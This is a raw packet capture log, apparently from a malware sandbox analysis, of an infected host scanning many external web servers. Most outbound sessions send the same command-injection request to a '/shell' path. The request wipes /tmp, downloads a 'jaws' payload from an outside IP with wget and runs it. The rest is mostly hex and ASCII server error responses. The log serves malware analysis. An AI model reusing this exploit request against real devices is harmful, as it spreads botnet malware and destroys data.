                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          372192.168.2.234729643.225.210.1880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:55.316812038 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:55.642260075 CET369INHTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Tue, 02 Jan 2024 05:24:55 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: keep-alive
                                                          via: CHN-HLhaerbin-SSPcctv4-CACHE5[1]
                                                          X-CCDN-FORBID-CODE: 040001
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          373192.168.2.2339068146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:55.519483089 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:54Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          374192.168.2.234731043.225.210.1880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:55.583858013 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:55.911710978 CET369INHTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Tue, 02 Jan 2024 05:24:55 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: keep-alive
                                                          via: CHN-HLhaerbin-SSPcctv4-CACHE8[2]
                                                          X-CCDN-FORBID-CODE: 040001
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          375192.168.2.2339082146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:55.849266052 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:55Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          376192.168.2.2351544107.172.87.20780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:55.853117943 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:56.017981052 CET500INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:55 GMT
                                                          Server: Apache/2.4.41 (Ubuntu)
                                                          Content-Length: 306
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 30 37 2e 31 37 32 2e 38 37 2e 32 30 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 107.172.87.207 Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          377192.168.2.235075680.15.65.10080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:55.923120975 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:56.219177961 CET1286INHTTP/1.1 404 Not Found
                                                          Date: Wed, 29 Nov 2023 09:28:52 GMT
                                                          Server: Apache/2.0.55 (Trustix Secure Linux/Linux)
                                                          Connection: close
                                                          Content-Type: text/html; charset=ISO-8859-1
                                                          Data Raw: 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 49 53 4f 2d 38 38 35 39 2d 31 22 3f 3e 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 4e 65 74 67 40 74 65 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 0a 20 20 0a 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 3b 55 52 4c 3d 27 2f 27 22 3e 0a 20 20 20 20 20 20 0a 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 23 46 46 46 46 46 46 3e 0a 0a 0a 0a 3c 53 43 52 49 50 54 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 61 76 61 73 63 72 69 70 74 2f 6d 65 6e 75 5f 61 72 72 61 79 2e 6a 73 22 20 74 79 70 65 3d 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3e 3c 2f 53 43 52 49 50 54 3e 0a 3c 53 43 52 49 50 54 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 61 76 61 73 63 72 69 70 74 2f 6d 6d 65 6e 75 2e 6a 73 22 20 74 79 70 65 3d 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3e 3c 2f 53 43 52 49 50 54 3e 0a 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 31 30 30 25 3e 0a 20 20 3c 74 72 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 31 35 30 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 5f 74 61 6c 63 2e 6a 70 67 22 3e 3c 2f 74 64 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 2a 3e 3c 2f 74 64 3e 0a 20 20 20 20 3c 74 64 20 77 69 64 74 68 3d 31 30 30 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 5f 6e 65 74 67 61 74 65 2e 6a 70 67 22 3e 3c 2f 74 64 3e 0a 20 20 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 21 2d 2d 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 62 61 72 72 65 66 69 6e 65 2e 6a 70 67 22 3e 3c 2f 64 69 76 2d 2d 3e 0a 0a 0a 0a 20 20 20 20 3c 63 65 6e 74 65 72 3e 3c 70 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 72 65 64 22 3e 43 65 74 74 65 20 70 61 67 65 20 6e 27 65 78 69 73 74 65 20 70 61 73 2e 3c 62 72 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 56 6f 75 73 20 73 65 72 65 7a 20 72 65 64 69 72 69 67 e9 20 73 75 72 20 6c 61 20 70 61 67 65 20 64 27 61 63 63 75 65 69 6c 20 64 75 20 6e 65 74 67 61 74 65 20 64 61 6e 73 20 33 20 73 65 63 6f 6e 64 65 73 2e 3c 62 72 2f 3e 3c 2f 66 6f 6e 74 3e 3c 2f 70 3e 3c 63 65 6e 74 65 72 2f 3e 0a 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 62 61 72 72 65 2e 6a 70 67 22 3e 3c 62 72 3e 0a 26 63 6f 70 79 20 54 41 4c 43 20 49 6e 66 6f 72 6d 61 74
                                                          Data Ascii: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>Netg@te</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta http-equiv="refresh" content="3;URL='/'"> </head><body bgcolor=#FFFFFF><SCRIPT language=JavaScript src="/javascript/menu_array.js" type=text/javascript></SCRIPT><SCRIPT language=JavaScript src="/javascript/mmenu.js" type=text/javascript></SCRIPT><table width=100%> <tr> <td width=150><img src="/images/logo_talc.jpg"></td> <td width=*></td> <td width=100><img src="/images/logo_netgate.jpg"></td> </tr></table>...div align="center"><img src="/images/barrefine.jpg"></div--> <center><p><font color="red">Cette page n'existe pas.<br/> Vous serez redirig sur la page d'accueil du netgate dans 3 secondes.<br/></font></p><center/><div align="center"><img src="/images/barre.jpg"><br>&copy TALC Informat
                                                          Jan 2, 2024 06:24:56.219194889 CET89INData Raw: 69 71 75 65 20 32 30 30 38 0a 0a 20 20 20 20 3c 73 6d 61 6c 6c 3e 4e 65 74 47 61 74 65 20 52 65 6c 65 61 73 65 20 34 2e 30 30 73 0a 3c 2f 73 6d 61 6c 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a
                                                          Data Ascii: ique 2008 <small>NetGate Release 4.00s</small></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          378192.168.2.2360976108.158.129.15680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:55.937733889 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:56.186606884 CET316INHTTP/1.1 403 Forbidden
                                                          Server: CloudFront
                                                          Date: Tue, 02 Jan 2024 05:24:56 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 151
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          379192.168.2.234627277.246.183.3080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:55.948920012 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:56.208889961 CET322INHTTP/1.1 403 Forbidden
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:56 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          380192.168.2.235964841.47.14.14580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:55.990421057 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:56.296410084 CET83INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Server: RomPager/4.07 UPnP/1.0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          381192.168.2.234868218.214.78.16180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:56.009741068 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:56.167438030 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:56 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          382192.168.2.2337750118.232.97.5180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:56.010020018 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          383192.168.2.236009452.188.170.14780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:56.015919924 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:56.238269091 CET459INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Date: Tue, 02 Jan 2024 05:24:56 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          384192.168.2.233666445.56.102.14680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:56.015984058 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:56.178826094 CET433INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:56 GMT
                                                          Server: Apache
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          385192.168.2.2345918176.112.147.6180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:56.122078896 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          386192.168.2.2343932121.128.130.680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:56.157593966 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:56.471991062 CET36INHTTP/1.1 303 See Other
                                                          Jan 2, 2024 06:24:56.472471952 CET38INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a
                                                          Data Ascii: Content-Type: text/plain
                                                          Jan 2, 2024 06:24:56.472482920 CET31INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                          Data Ascii: Connection: close
                                                          Jan 2, 2024 06:24:56.472491980 CET49INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 30 32 20 4a 61 6e 20 32 30 32 34 20 30 35 3a 32 33 3a 32 33 20 47 4d 54 0d 0a
                                                          Data Ascii: Date: Tue, 02 Jan 2024 05:23:23 GMT
                                                          Jan 2, 2024 06:24:56.472503901 CET70INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 31 32 37 2e 30 2e 30 2e 31 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 0d 0a
                                                          Data Ascii: Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+
                                                          Jan 2, 2024 06:24:56.472512960 CET31INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a
                                                          Data Ascii: Content-Length: 0
                                                          Jan 2, 2024 06:24:56.472523928 CET14INData Raw: 0d 0a
                                                          Data Ascii:


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          387192.168.2.2339096146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:56.177860975 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
